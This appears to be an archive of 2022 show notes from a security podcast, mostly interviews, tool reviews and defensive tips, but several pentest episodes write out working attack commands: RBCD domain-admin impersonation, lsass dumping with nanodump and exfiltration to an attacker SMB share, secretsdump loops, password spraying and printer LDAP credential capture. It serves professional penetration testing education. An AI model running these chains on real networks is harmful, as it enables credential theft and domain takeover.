"FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings
A story about the time I took down a domain controller (yikes)

7MS #549: Interview with Christopher Fielder and Daniel Thanos of Arctic Wolf Dec 02, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today my friends Christopher Fielder and Daniel Thanos from Arctic Wolf chat with me about what kinds of icky things bad guys/gals are doing to our networks, and how we can arm ourselves with actioanble threat intelligence and do something about it!

P.S. This is Christopher's seventh time on the program. Be sure to check out his first, second, third, fourth, fifth and sixth interviews with 7MS.

7MS #548: Tales of Pentest Pwnage - Part 44 Nov 25, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Happy belated Thanksgiving!

This is not a brag or a flex, but this episode covers a coveted achievement I haven't achieved in my whole life...until now: TDAD: Triple Domain Admin Dance!!!!1111!!!1!1!!!!

We talk about the fun attack path that led to the TDAD (hint: always check Active Directory user description fields!), as well as a couple quick, non-spoilery reviews of a few movies: V for Vendetta and The Black Phone.

7MS #547: Tales of Pentest Pwnage - Part 43 Nov 18, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred!

Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.

7MS #546: Securing Your Mental Health - Part 3 Nov 11, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Today we're talking about securing your mental health! I share some behind-the-scenes info about my own mental health challenges, and share a great tip a counselor gave me for getting into a good headspace before heading into a difficult conversation/situation.

7MS #545: First Impressions of Snipe-IT Nov 04, 2022

Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms.

Hey friends, today we're giving you a first impressions look at a free easy asset management tool called Snipe-IT you can use to build your inventory with! Why is this important? Because it's the first critical security control! It might help to see this tool in action, so we invite you to check out our recent Twitch stream where we got it up and running in about 45 minutes.

7MS #544: Interview with Nato Riley of Blumira Oct 28, 2022

Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms!

Today we have a really fun interview with Nato Riley of Blumira. He cut his IT/security teeth working for a cell phone company, exorcising malware demons out of workstations, and even building an email-based SIEM. He has had a very cool career path that involves embracing newbness, pushing aside imposter syndrome, and even begging for jobs! I think this interview can best be summed up by a direct quote from Nato:

"Things absolutely go wrong, and I think that's what deters people from trying. But just because something goes wrong, doesn't mean you're necessarily going to die from it. So why not try?"

7MS #543: How to Succeed in Business Without Really Crying - Part 12 Oct 21, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Hey friends! Today we talk about a SoSaaS (Spreadsheet on Steroids as a Service...not a real thing) that is helping 7MinSec be more organized - both from a project standpoint and from an "alert us when important things are due!" standpoint.

7MS #542: Eating the Security Dog Food - Part 5 Oct 14, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's episode we talk more about eating the security dog food (following the best practices we preach!). Specifically, we focus on keeping that bloated email inbox a little more lean and mean. There are lots of tools/services to help with this, but we had a blast playing with MailStore (not a sponsor but we'd like them to be:-).

7MS #541: Tales of Blue Team Bliss - Part 2 Oct 07, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today we talk about configuring your Active Directory with MFA protection thanks to AuthLite.

In the tangent department, we give you a short, non-spoilery review of the film Smile.

7MS #540: Tales of Blue Team Bliss Sep 30, 2022

Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include:

The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain.
We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream.
Defensive security tools that can interrupt the SharpHound collection!
EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!

7MS #539: Eating the Security Dog Food - Part 4 Sep 23, 2022

Today we revisit a series we haven’t touched in a long time all about eating the security dog food. TLDL about this series is I often find myself preaching security best practices, but don’t always follow them as a consultancy. So today we talk about:

How the internal 7MS infosec policy development is coming along
Why I’m no longer going to be “product agnostic” going forward
Some first impressions of a new tool I’m trying called ITGlue (not a sponsor)
How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs

Also, don’t forget we are doing weekly livestreams on security topics!

7MS #538: First Impressions of Airlock Digital Sep 16, 2022

Hey friends! Today we're giving you a first impressions episode all about Airlock Digital, an application allowlisting solution. They were kind enough to let us play with it in our lab with the intention of exploring its bells and whistles, so we're excited to report back our findings in podcast form.

TLDL: we really like this solution! It is easy to deploy (see this YouTube video for a quick walkthrough). Once I had it going in the lab, I tried administering it without reading any of the documentation, and figured out most of the workflows with ease. I just ran into a couple questions that the Airlock folks were great about answering quickly.

I want to better understand the "Microsoft way" to do application allowlisting - using their standard offering or something like AaronLocker. But several colleagues have told me they had "OMG moments" where a C-level staff member suddenly needed to run something like ringcentral.exe and they weren't able to because of app blocklisting. It then becomes difficult to quickly allow that .exe to run without pushing GPO updates or having someone log in as local admin or something like that. But Airlock has a cool, killer feature to address this need...take a listen to today's program to learn more!

7MS #537: Tales of Pentest Pwnage - Part 42 Sep 09, 2022

In today's episode we share some tips we've picked up in the last few weeks of pentesting, with hopes it will save you from at least a few rounds of smashing your face into the keyboard. Tips include:

If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line:

cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"'

Then you can scan with nmap to find the "live" hosts:

nmap -sn -iL targets.txt

For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions.
If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like:

cme smb VICTIM-SYSTEM -k --sam or cme smb VICTIM-SYSTEM -k -M wdigest -M ACTION=enable

Take the time to search SMB shares with something like PowerHuntShares. If you have write access in places, drop an SCF file to capture/pass hashes!
Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp!
Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!

7MS #536: Interview with Amanda Berlin of Blumira Sep 02, 2022

Today we're so excited to welcome Amanda Berlin, Lead Incident Detection Engineer at Blumira, back to the show (did you miss Amanda's first appearance on the show? Check it out here)! You might already be familiar with Amanda's awesome Defensive Security Handbook or her work with the Mental Health Hackers organization. Today we virtually sat down to tackle a variety of topics and questions, including:

What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange? Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them?
Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)? Spoiler alert: yes.
Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec?
Does Amanda think there's a gender bias in the security industry?
Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

7MS #535: Rage Against the Remediation Aug 27, 2022

Today's episode covers three remediation-focused topics that kind of grind my gears and/or get me frustrated with myself. I'm curious for your thoughts on these, so reach out via Slack or Twitter and maybe we'll do a future live stream on this topic.

How do you get clients to actually care when we explain the threats on their network that are a literal 10/10 on the CVSS scale?
Password policies - they're not just as easy as "Have a password of X length with Y complexity."
Fixing the various broadcast traffic and protocol issues that give us easy wins with Responder and mitm6 - it's more nuanced than just "Disable LLMNR/NETBIOS/MDNS and shut off IPv6." This article discusses these challenges in more detail.

7MS #534: Tales of Pentest Pwnage - Part 41 Aug 19, 2022

Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points:

If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it!

#!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do echo --- $Line --- >> dump.txt echo --------------------- >> dump.txt sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt echo --------------------- >> dump.txt done

From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance.

Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm!
The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)

7MS #533: Tales of Pentest Pwnage - Part 40 Aug 12, 2022

Ok, ok, I know. I almost always say something like "Today is my favorite tale of pentest pwnage." And guess what? Today is my favorite tale of pentest pwnage, and I don't even know how it's going to end yet, so stay tuned to next week's (hopefully) exciting conclusion. For today, though, I've got some pentest tips to hopefully help you in your journeys of pwnage:

PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them. Note there is a -Threads flag to adjust the intensity of your scan.
Are your mitm6 attacks not working properly - even though they look like they should? There might be seem LDAP/LDAPs protections in play. Use LdapRelayScan to verify!
Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working? Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1. Also look at PassTheCert as another tool to abuse ADCS vulnerabilities.

Example syntax for LdapCurrentUser:

Get-LdapCurrentUser -certificate my.pfx -server my.domain.controller:636 -usessl -CertificatePassword admin

If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset. That way you can quickly find users who haven't changed their password since the AD backup:

get-aduser -filter * -server victimdomain.local -properties pwdlastset,passwordlastset,enabled | where { $_.Enabled -eq $True} | select-object samaccountname,passwordlastset | sort-object passwordlastset

7MS #532: Tales of Pentest Pwnage - Part 39 Aug 05, 2022

Hey friends, wow...we're up to thirty-nine episodes of pwnage? Should we make a cake when we hit the big 4-0?! Anyway, today's TLDL is this:

If you get a nagging suspicion about something you find during enumeration, make sure to either come back to it later, or exhaust the path right away so you don't miss something! Because I did :-/

A tip that's been helping me speed along my use of CrackMapExec and other tools is by using Kerberos authentication. You can grab a ticket for your test AD account by using Impacket like so:

gettgt.py victim.domain/LowPrivUser export KRB5CCNAME=LowPrivUser.ccache

Then in most tools you can pass the cred by doing something like:

crackmapexec smb DC01 -k

In my enumeration of this network, I used Certipy to find potential attack paths against Active Directory Certificate Services. Something cool I learned is that Certipy will spit out both a text and json dump so you can import into BloodHound and then pair that data with their custom queries json file for beautiful visual potential pwnage!

I ran into an issue where my certificate shenanigans resulted in an KDC_ERR_PADATA_TYPE_NOSUPP. I originally gave up on this attack path, only to learn about this awesome PassTheCert tool from this rad blog post! After initially being hesitant to use a tool I'd never heard of, I raised a GitHub issue to calm my nerves and, shortly after, found myself doing a domain admin dance.

Oh, and although I didn't use it on this specific pentest, coercer is an awesome tool that helps you, ya know, coerce things!

7MS #531: Interview with Christopher Fielder and Eugene Grant of Arctic Wolf Aug 01, 2022

Today we're joined by some of our friends at Arctic Wolf - Eugene Grant and Christopher Fielder - to talk about compliance. Now hold on - don't leave yet! I know for many folks, compliance makes them want to bleach their eyeballs. But compliance is super important - especially because it is not the same as being secure. So we discuss the differences between security and compliance, and practical work we can do to actually be more compliant and secure, including:

Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out!
Creating core policies and procedures that you will actually follow
Learning about security frameworks that will help you build a security program from scratch
Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit!
Knowing where your crown jewels are - be that data, a database, a key system, etc.
Writing critical documentation - especially backup/restore procedures.
Forming a security "dream team" to help drive your program
Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!)

P.S. this is Christopher's sixth time on the program. Be sure to check out his first, second, third, fourth and fifth interviews with 7MS.

7MS #530: Tales of Pentest Pwnage - Part 38 Jul 22, 2022

Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as:

Get-InternalSubnets.ps1 - for getting internal subnets
Adalanche for grabbing Active Directory info (similar to SharpHound)

This tool worked well for me with this syntax:

adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS

Copernic Desktop Search for pillaging through shares with Google-like search capabilities!
PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!
CeWL for creating awesome wordlists to crack with!

I don't have a Toyota TRD Pro, but I can't stop watching this reel.

7MS #529: Interview with Matthew Warner of Blumira Jul 15, 2022

Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11!

Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including:

How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?
Why open source detections are a great starting point - but not a magic bullet
Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?
Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?
Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?
Common lateral movement tools/techniques
Why honeypots rule!

7MS #528: Securing Your Family During and After a Disaster - Part 6 Jul 08, 2022

In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for:

Do we have creds to log onto his computer?
How about his email accounts?
Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
Do we have redundancy in this plan, or is it all on paper in a file somewhere?

7MS #527: First Impressions of Purple Knight Jul 01, 2022

In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489.

7MS #526: Tales of Pentest Pwnage - Part 37 Jun 24, 2022

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO:

Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!

In regards to defending against secretsdump, this article I found this article to be super interesting.

7MS #525: First Impressions of InsightIDR - Part 2 Jun 17, 2022

Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks:

Active Directory enumeration via SharpHound
Password spraying through Rubeus
Kerberoasting and ASREPRoasting via Rubeus
Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi.
Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping.
Pass-the-hash attacks with CrackMapExec

In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves:

7MS #524: How to Update VMWare ESXi From the Command Line Jun 10, 2022

I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY

Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates:

List all upgrade profiles:

esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml

Grep for just the ones you want (in my case ESXi 7.x):

esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

Apply the one you want!

esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

7MS #523: Local Administrator Password Solution - RELOADED! Jun 03, 2022

Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017!

Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go!

(See the show notes for today's episode for more details!)

7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2 May 27, 2022

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

7MS #521: Tales of Pentest Pwnage - Part 36 May 20, 2022

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD:

# From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN

Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources.

Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

7MS #520: How to Succeed in Business Without Really Crying - Part 11 May 13, 2022

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include:

Setting the right communication cadence - and communication channels - with a customer during a pentest.
Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).
How we're using Intercom to publish self-help/FAQ articles for 7MS.

7MS #519: Tales of Pentest Pwnage - Part 35 May 07, 2022

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review:

7MS #518: Interview with Amanda Berlin of Blumira Apr 27, 2022

Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include:

Can you tell us more about your infosec superhero origin story and creation of your book?
Will there ever be a new version of the Defensive Security Handbook?
What blue team certs/YouTube vids/classes/conferences give the best bang for your buck?
Was it a mistake to invent computers?
From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)?
You can wave a magic wand and solve any three security challenges instantly - what do you choose?
Infosec Twitter drama. Love it? Leave it? Something inbetween?
Tips to prevent business email compromise?
How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web?
Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)

7MS #517: DIY Pentest Dropbox Tips - Part 6 Apr 22, 2022

Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover:

Auto installing Splashtop This can be done automatically by downloading your splashtop.exe install and issuing this command:

splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2

Auto installing Ninite This can be done in a batch script like so:

agent.msi /quiet ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt

The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt

Auto installing Uptimerobot monitoring We do this by first creating a script called c:\uptimerobot.ps1 that makes the "phone home" call to UptimeRobot:

Start-Transcript -Path c:\heartbeat.log -Append Invoke-Webrequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing Stop-Transcript

Then we install the scheduled task itself like so:

schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:\uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM"

7MS #516: Tips to Travel More Securely Apr 14, 2022

In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.

7MS #515: Securing Your Family During and After a Disaster - Part 5 Apr 06, 2022

Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago. In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.

7MS #514: Tales of Pentest Pwnage - Part 34 Mar 30, 2022

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:

I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd
Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!
Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

7MS #513: Interview with Christopher Fielder and Jon Crotty of Arctic Wolf Mar 23, 2022

Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the report's key points here without needing to provide an email address). The three of us dig in to talk about some of the report's specific highlights, including:

Many orgs are running the bare minimum (or nothing!) for endpoint protection
Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether
Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well
Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk
The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure

P.S. this is Christopher's fifth time on the program. Be sure to check out his first, second, third and fourth interviews with 7MS.

7MS #512: First Impressions of InsightIDR Mar 17, 2022

Today I'm sharing some first impressions of the Rapid 7 InsightIDR as kind of a teaser for an eventual new chapter in our Desperately Seeking a Super SIEM for SMBs series. Disclaimer: remember these are first impressions. There may be some missed detections I talk about today that are a me problem and not the technology. I hope to get to the root of those unresolved issues by the time I talk more formally about InsightIDR in a future episode. Enjoy!

7MS #511: How to Succeed in Business Without Really Crying - Part 10 Mar 11, 2022

Today we're continuing our series focused on [owning a security consultancy], talking specifically about:

How not to give up on warm sales leads, even if they haven't panned out for 5+ years!
Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus
A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs

7MS #510: First Impressions of Tailscale Mar 02, 2022

Today we share some first impressions of Tailscale, a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!

7MS #509: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 4 Feb 23, 2022

Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.

7MS #508: Tales of Pentest Pwnage - Part 33 Feb 18, 2022

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack.

We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this:

# Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt

Enjoy delicious passwords and hashes in the dump.txt file!

7MS #507: Interview with Matthew Warner of Blumira Feb 09, 2022

Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira. We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 (Microsoft's audit policy recommendations, sysmon, sysmon modular), as well as how to get better logging in hard-to-reach places like Kerberos. Be sure to also check out Blumira's resources on detecting Kerberoasting and simplifying Windows log collection and ongoing management with Poshim. And please check out the Webinar we did together which demonstrates some common pentest attacks - and how Blumira can detect them!

7MS #506: Tales of Pentest Pwnage - Part 32 Feb 03, 2022

Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for maximum pwnage:

Run PingCastle
Do the SharpHound/BloodHound dumps
Run the DHCP poisoning module of Responder
Check the ms-DS-MachineAccountQuota value in the domain - if its at the default (10), then any user can add machines to the domain.

Why is the ability to add machines to the domain important? Because in the case of the sAMAccountName spoofing, if you have a non-domain-joined machine like I do, you need the ability to add a computer object to the domain. Check the Pentestlab.blog article for more info, but essentially, if you have an unpatched domain controller and the ability to add computer objects to the domain, you can pull off the attack. The article goes into crazy good technical detail, and here's my not-so-technical explanation:

If I was on a pentest, and the DC was called 7MS-DC01, and I could join a machine to the domain (which as a reminder - ANY user can do if the machine quota value is at the default value of 10), I could rename that machine account to be 7MS-DC01 without the dollar sign, request a TGT for the domain controller's account, then restore the machine name back to what it was before. Now, because the TGT is stored in memory, we can use the S4U2self Kerberos extension to request a service ticket using a domain admin account. And because the original ticket belong to the 7MS-DC01 machine name which now doesn't exist, Kerberos will look for 7MS-DC01$ and will issue the ticket for the requested service.

I might've butchered that explanation mom, but I tried my best!

TLDL/TLDR: find and exploit these unpatched domain controllers with noPac. Enjoy!

7MS #505: Pwning Wifi PSKs and PMKIDs with Bettercap Jan 28, 2022

Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap).

7MS #504: Monitoring All Your Cloud Thingies with UptimeRobot Jan 20, 2022

Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot. And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.

7MS #503: First Impressions of Brute Ratel Jan 12, 2022

Today's episode is all about Brute Ratel, a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement is, and the "killer feature" that makes me giggle like the bad guy from Sonic the Hedgehog.

